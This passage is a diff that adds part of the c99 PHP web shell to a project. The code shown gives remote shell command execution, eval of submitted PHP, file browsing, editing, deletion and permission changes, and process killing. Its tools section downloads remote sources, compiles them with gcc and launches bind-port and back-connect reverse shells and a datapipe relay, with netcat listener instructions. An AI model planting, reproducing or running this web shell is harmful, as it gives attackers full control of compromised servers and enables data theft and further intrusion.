+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps -aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  echo "<b>Result of execution this command</b>:<br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[Info]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[Change]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Download]</a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
+  <b>^";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+if ($act == "tools")
+{
+ $bndportsrcs = array(
+  "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+  "c99sh_bindport.c"=>array("Using C","%path %port %pass")
+ );
+ $bcsrcs = array(
+  "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+  "c99sh_backconn.c"=>array("Using C","%path %host %port")
+ );
+ $dpsrcs = array(
+  "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
+  "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
+ );
+ if (!is_array($bind)) {$bind = array();}
+ if (!is_array($bc)) {$bc = array();}
+ if (!is_array($datapipe)) {$datapipe = array();}
+ 
+ if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
+ if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
+  
+ if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
+ if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
+ 
+ if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
+ if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
+ if (!empty($bindsubmit))
+ {
+  echo "<b>Result of binding port:</b><br>";
+  $v = $bndportsrcs[$bind["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $w = explode(".",$bind["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%port",$bind["port"],$v[1]);
+    $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
+    else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ if (!empty($bcsubmit))
+ {
+  echo "<b>Result of back connection:</b><br>";
+  $v = $bcsrcs[$bc["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  else
+  {
+   $w = explode(".",$bc["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%host",$bc["host"],$v[1]);
+    $v[1] = str_replace("%port",$bc["port"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
+   }
+  }
+ }
+ if (!empty($dpsubmit))
+ {
+  echo "<b>Result of datapipe-running:</b><br>";
+  $v = $dpsrcs[$datapipe["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $srcpath = $tmpdir.$datapipe["src"];
+   $w = explode(".",$datapipe["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
+    $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
+    $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
+    else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
+ foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+ ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
+<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
+foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
+}
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+ echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("[hex]","info"),
+   array("[html]","html"),
+   array("[txt]","txt"),
+   array("[Code]","code"),
+   array("[Session]","phpsess"),
+   array("[exe]","exe"),
+   array("[SDB]","sdb"),
+   array("[gif]","img"),
+   array("[ini]","ini"),
+   array("[download]","download"),
+   array("[rtf]","notepad"),
+   array("[change]","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
